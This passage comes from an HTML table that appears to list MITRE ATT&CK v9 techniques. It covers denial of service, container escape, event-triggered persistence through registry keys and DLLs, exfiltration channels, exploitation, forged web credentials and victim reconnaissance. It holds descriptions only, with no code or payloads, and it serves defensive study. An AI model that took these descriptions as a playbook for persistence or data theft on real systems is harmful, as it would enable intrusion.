</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1499/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1499/002"> Service Exhaustion Flood </a> </td> <td> Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services; however, others have been targeted as well. Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1499/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1499/003"> Application Exhaustion Flood </a> </td> <td> Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1499/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1499/004"> Application or System Exploitation </a> </td> <td> Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1611"> T1611 </a> </td> <td> <a href="/versions/v9/techniques/T1611"> Escape to Host </a> </td> <td> Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. 
In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1585"> T1585 </a> </td> <td> <a href="/versions/v9/techniques/T1585"> Establish Accounts </a> </td> <td> Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1585/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1585/001"> Social Media Accounts </a> </td> <td> Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1585/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1585/002"> Email Accounts </a> </td> <td> Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct <a href="/versions/v9/techniques/T1598">Phishing for Information</a> or <a href="/versions/v9/techniques/T1566">Phishing</a>. 
Adversaries may also take steps to cultivate a persona around the email account, such as through use of <a href="/versions/v9/techniques/T1585/001">Social Media Accounts</a>, to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: <a href="/versions/v9/techniques/T1583/001">Domains</a>). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1546"> T1546 </a> </td> <td> <a href="/versions/v9/techniques/T1546"> Event Triggered Execution </a> </td> <td> Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1546/001"> Change Default File Association </a> </td> <td> Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1546/002"> Screensaver </a> </td> <td> Adversaries may establish persistence by executing malicious content triggered by user inactivity. 
Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1546/003"> Windows Management Instrumentation Event Subscription </a> </td> <td> Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user logon, or the computer's uptime. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1546/004"> Unix Shell Configuration Modification </a> </td> <td> Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User <a href="/versions/v9/techniques/T1059/004">Unix Shell</a>s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. 
These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1546/005"> Trap </a> </td> <td> Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1546/006"> LC_LOAD_DYLIB Addition </a> </td> <td> Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. There are tools available to perform these changes. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1546/007"> Netsh Helper DLL </a> </td> <td> Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. 
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1546/008"> Accessibility Features </a> </td> <td> Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/009"> .009 </a> </td> <td> <a href="/versions/v9/techniques/T1546/009"> AppCert DLLs </a> </td> <td> Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLogonW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/010"> .010 </a> </td> <td> <a href="/versions/v9/techniques/T1546/010"> AppInit DLLs </a> </td> <td> Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppInit_DLLs</code> value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/011"> .011 </a> </td> <td> <a href="/versions/v9/techniques/T1546/011"> Application Shimming </a> </td> <td> Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that they will work with Windows 10. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/012"> .012 </a> </td> <td> <a href="/versions/v9/techniques/T1546/012"> Image File Execution Options Injection </a> </td> <td> Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. 
When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g notepad.exe</code>). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/013"> .013 </a> </td> <td> <a href="/versions/v9/techniques/T1546/013"> PowerShell Profile </a> </td> <td> Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when <a href="/versions/v9/techniques/T1059/001">PowerShell</a> starts and can be used as a logon script to customize user environments. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/014"> .014 </a> </td> <td> <a href="/versions/v9/techniques/T1546/014"> Emond </a> </td> <td> Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a <a href="/versions/v9/techniques/T1543/004">Launch Daemon</a> that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/015"> .015 </a> </td> <td> <a href="/versions/v9/techniques/T1546/015"> Component Object Model Hijacking </a> </td> <td> Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system. References to various COM objects are stored in the Registry. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1480"> T1480 </a> </td> <td> <a href="/versions/v9/techniques/T1480"> Execution Guardrails </a> </td> <td> Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduce collateral damage from an adversary’s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1480/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1480/001"> Environmental Keying </a> </td> <td> Adversaries may environmentally key payloads or other features of malware to evade defenses and constrain execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of <a href="/versions/v9/techniques/T1480">Execution Guardrails</a> that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1048"> T1048 </a> </td> <td> <a href="/versions/v9/techniques/T1048"> Exfiltration Over Alternative Protocol </a> </td> <td> Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1048/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1048/001"> Exfiltration Over Symmetric Encrypted Non-C2 Protocol </a> </td> <td> Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1048/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1048/002"> Exfiltration Over Asymmetric Encrypted Non-C2 Protocol </a> </td> <td> Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1048/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1048/003"> Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol </a> </td> <td> Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1041"> T1041 </a> </td> <td> <a href="/versions/v9/techniques/T1041"> Exfiltration Over C2 Channel </a> </td> <td> Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1011"> T1011 </a> </td> <td> <a href="/versions/v9/techniques/T1011"> Exfiltration Over Other Network Medium </a> </td> <td> Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1011/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1011/001"> Exfiltration Over Bluetooth </a> </td> <td> Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1052"> T1052 </a> </td> <td> <a href="/versions/v9/techniques/T1052"> Exfiltration Over Physical Medium </a> </td> <td> Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1052/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1052/001"> Exfiltration over USB </a> </td> <td> Adversaries may attempt to exfiltrate data over a USB connected physical device. 
In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1567"> T1567 </a> </td> <td> <a href="/versions/v9/techniques/T1567"> Exfiltration Over Web Service </a> </td> <td> Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1567/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1567/001"> Exfiltration to Code Repository </a> </td> <td> Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs is often over HTTPS, which gives the adversary an additional level of protection. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1567/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1567/002"> Exfiltration to Cloud Storage </a> </td> <td> Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, editing, and retrieval of data from a remote cloud storage server over the Internet. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1190"> T1190 </a> </td> <td> <a href="/versions/v9/techniques/T1190"> Exploit Public-Facing Application </a> </td> <td> Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services. Depending on the flaw being exploited, this may include <a href="/versions/v9/techniques/T1211">Exploitation for Defense Evasion</a>. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1203"> T1203 </a> </td> <td> <a href="/versions/v9/techniques/T1203"> Exploitation for Client Execution </a> </td> <td> Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly use to do work, so they are a useful target for exploit research and development because of their high utility. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1212"> T1212 </a> </td> <td> <a href="/versions/v9/techniques/T1212"> Exploitation for Credential Access </a> </td> <td> Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions. Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1211"> T1211 </a> </td> <td> <a href="/versions/v9/techniques/T1211"> Exploitation for Defense Evasion </a> </td> <td> Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1068"> T1068 </a> </td> <td> <a href="/versions/v9/techniques/T1068"> Exploitation for Privilege Escalation </a> </td> <td> Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. 
Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1210"> T1210 </a> </td> <td> <a href="/versions/v9/techniques/T1210"> Exploitation of Remote Services </a> </td> <td> Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1133"> T1133 </a> </td> <td> <a href="/versions/v9/techniques/T1133"> External Remote Services </a> </td> <td> Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as <a href="/versions/v9/techniques/T1021/006">Windows Remote Management</a> can also be used externally. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1008"> T1008 </a> </td> <td> <a href="/versions/v9/techniques/T1008"> Fallback Channels </a> </td> <td> Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1083"> T1083 </a> </td> <td> <a href="/versions/v9/techniques/T1083"> File and Directory Discovery </a> </td> <td> Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from <a href="/versions/v9/techniques/T1083">File and Directory Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1222"> T1222 </a> </td> <td> <a href="/versions/v9/techniques/T1222"> File and Directory Permissions Modification </a> </td> <td> Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1222/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1222/001"> Windows File and Directory Permissions Modification </a> </td> <td> Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1222/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1222/002"> Linux and Mac File and Directory Permissions Modification </a> </td> <td> Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1495"> T1495 </a> </td> <td> <a href="/versions/v9/techniques/T1495"> Firmware Corruption </a> </td> <td> Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot. Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1187"> T1187 </a> </td> <td> <a href="/versions/v9/techniques/T1187"> Forced Authentication </a> </td> <td> Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1606"> T1606 </a> </td> <td> <a href="/versions/v9/techniques/T1606"> Forge Web Credentials </a> </td> <td> Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1606/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1606/001"> Web Cookies </a> </td> <td> Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1606/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1606/002"> SAML Tokens </a> </td> <td> An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate. The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>. 
Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1592"> T1592 </a> </td> <td> <a href="/versions/v9/techniques/T1592"> Gather Victim Host Information </a> </td> <td> Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1592/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1592/001"> Hardware </a> </td> <td> Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1592/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1592/002"> Software </a> </td> <td> Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.). 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1592/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1592/003"> Firmware </a> </td> <td> Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1592/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1592/004"> Client Configurations </a> </td> <td> Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1589"> T1589 </a> </td> <td> <a href="/versions/v9/techniques/T1589"> Gather Victim Identity Information </a> </td> <td> Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1589/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1589/001"> Credentials </a> </td> <td> Adversaries may gather credentials that can be used during targeting. 
Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1589/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1589/002"> Email Addresses </a> </td> <td> Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1589/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1589/003"> Employee Names </a> </td> <td> Adversaries may gather employee names that can be used during targeting. Employee names may be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1590"> T1590 </a> </td> <td> <a href="/versions/v9/techniques/T1590"> Gather Victim Network Information </a> </td> <td> Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1590/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1590/001"> Domain Properties </a> </td> <td> Adversaries may gather information about the victim's network domain(s) that can be used during targeting. 
Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1590/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1590/002"> DNS </a> </td> <td> Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1590/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1590/003"> Network Trust Dependencies </a> </td> <td> Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1590/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1590/004"> Network Topology </a> </td> <td> Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure. 
